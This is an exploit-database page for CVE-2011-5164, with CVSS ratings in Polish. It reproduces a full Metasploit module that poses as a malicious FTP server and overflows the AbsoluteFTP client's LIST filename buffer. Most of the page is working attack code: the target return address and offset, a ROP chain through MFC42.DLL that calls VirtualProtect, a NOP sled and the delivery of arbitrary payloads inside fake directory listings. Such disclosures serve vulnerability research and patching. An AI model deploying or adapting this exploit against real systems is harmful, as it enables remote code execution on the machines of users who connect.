AbsoluteFTP 1.9.6 - 2.2.10 Remote Buffer Overflow (LIST)

2012.09.17

Credit: Node

Risk: High

Local: No

Remote: Yes

CVE: CVE-2011-5164

CWE: CWE-119

Ogólna skala CVSS: 9.3/10

Znaczenie: 10/10

Łatwość wykorzystania: 8.6/10

Wymagany dostęp: Zdalny

Złożoność ataku: Średnia

Autoryzacja: Nie wymagana

Wpływ na poufność: Pełny

Wpływ na integralność: Pełny

Wpływ na dostępność: Pełny

# Exploit Title: AbsoluteFTP 1.9.6 - 2.2.10 Remote Buffer Overflow (LIST)
# Date: 2011-11-09
# Author: Node
# Software Link: http://www.vandyke.com/pub/AbsoluteFTP/aftp2210.exe
# Version: 1.9.6 - 2.2.10
# Tested on: Windows XP SP3, Windows 7 SP1
# CVE : -
# Exploit has been tested to work on:
# AbsoluteFTP 2.2.10 (build 252)
# AbsoluteFTP 2.2.9 (build 248)
# AbsoluteFTP 2.2.8 (build 241)
# AbsoluteFTP 2.2.7 (build 238)
# AbsoluteFTP 2.2.6 (build 230)
# AbsoluteFTP 2.2.5 (build 225)
# AbsoluteFTP 2.2.4 (build 216)
# AbsoluteFTP 2.2.3 (build 210)
# AbsoluteFTP 2.2.2 (build 203)
# AbsoluteFTP 2.2 (build 197)
# AbsoluteFTP 2.2 (build 291)
# AbsoluteFTP 2.2B3 (build 163)
# AbsoluteFTP 2.2B2 (build 158)
# AbsoluteFTP 2.2B1 (build 144)
# AbsoluteFTP 2.0.5 (build 297)
# AbsoluteFTP 2.0.4 (build 293)
# AbsoluteFTP 2.0.3 (build 289)
# AbsoluteFTP 1.9.6
# Does not work on:
# AbsoluteFTP 1.8
##
# $Id: $
# Skeleton generated by mona.py - Corelan Team
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::FtpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'AbsoluteFTP 1.9.6 - 2.2.10 Remote Buffer Overflow (LIST)',
'Description' => %q{
This module exploits VanDyke Software AbsoluteFTP by overflowing
a filename buffer related to the LIST command.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Node', # Original discovery, MSF module, ROP code
],
'Version' => '$Revision:$',
'References' =>
[
[ 'OSVDB', '---' ],
[ 'CVE', '---' ],
[ 'URL', '---' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x0d\x5c\x2f\x0a",
},
'Targets' =>
[
[ 'WinXP SP2 - Windows 7 SP1 / AbsoluteFTP 1.9.6 - 2.2.10.252',
{
'Ret' => 0x5f479005,
'Offset' => 3336
}
],
],
'Privileged' => false,
'DisclosureDate' => 'MONTH DAY YEAR',
'DefaultTarget' => 0))
end
#copypasted from ScriptFTP exploit
def on_client_unknown_command(c,cmd,arg)
c.put("200 OK\r\n")
end
def on_client_command_list(c,arg)
conn = establish_data_connection(c)
if(not conn)
c.put("425 Can't build data connection\r\n")
return
end
print_status(" - Data connection set up")
code = 150
c.put("#{code} Here comes the directory listing.\r\n")
code = 226
c.put("#{code} Directory send ok.\r\n")
rop_gadgets =
[
0x5f46a206, # POP EAX # RETN (MFC42.DLL)
0x5f49b260, # <- *&VirtualProtect()
0x5f413fa0, # MOV EAX,DWORD PTR DS:[EAX] # RETN 04 ** [MFC42.DLL]
0x5f418d93, # PUSH EAX # ADD AL,5F # POP ESI # POP EBX # RETN ** [MFC42.DLL]
0x90909090, # NOPS (RETN 4)
0x90909090, # NOPS (-> ebx)
0x5f432001, # POP EBP # RETN (MFC42.DLL)
0x5F4774D5, # ptr to 'jmp esp' (from MFC42.DLL)
0x5f46a206, # POP EAX # RETN (MFC42.DLL)
0xfffffdff, # value to negate, target value : 0x00000201, target reg : ebx #<--ADJUST ME FOR BIGGER PAYLOAD
0x5f46f6dd, # NEG EAX # RETN (MFC42.DLL)
0x5f47909a, # XCHG EAX,EBX # DEC EDX # POP EDI # RETN (MFC42.DLL)
0x90909090, # NOPS (-> edi)
0x5f498456, # POP ECX # RETN (MFC42.DLL)
0x5F4D1115, # RW pointer (lpOldProtect) (-> ecx) !!!
0x5f46a206, # POP EAX # RETN (MFC42.DLL)
0xffffffc0, # value to negate, target value : 0x00000040, target reg : edx
0x5f46f6dd, # NEG EAX # RETN (MFC42.DLL)
0x5f4892df, # XCHG EAX,EDX # DEC EAX # POP EDI # RETN (MFC42.DLL)
0x5f479005, # ROP NOP (-> edi)
0x5f46a206, # POP EAX # RETN (MFC42.DLL)
0x90909090, # NOPS (-> eax)
0x5f4755b8, # PUSHAD # RETN (MFC42.DLL)
].pack("V*")
buffer = [0x5f479005].pack("V*")*848 #ROP NOP's
buffer << rop_gadgets
buffer << "\x90"*30
buffer << payload.encoded
#copypasted from ScriptFTP exploit
print_status(" - Sending directory list via data connection")
dirlist = "-rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 #{buffer}.txt\r\n"
dirlist << " 5 ftpuser ftpusers 512 Jul 26 2001 A\r\n"
dirlist << "rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 #{buffer}.txt\r\n"
conn.put(dirlist)
conn.close
return
end
end

Referencje:

http://www.securityfocus.com/bid/50614

http://www.saintcorporation.com/cgi-bin/exploit_info/vandyke_absoluteftp_list_client_overflow

http://www.osvdb.org/77105

http://www.exploit-db.com/exploits/18102

http://secunia.com/advisories/46781

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

AbsoluteFTP 1.9.6 - 2.2.10 Remote Buffer Overflow (LIST)

Referencje:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.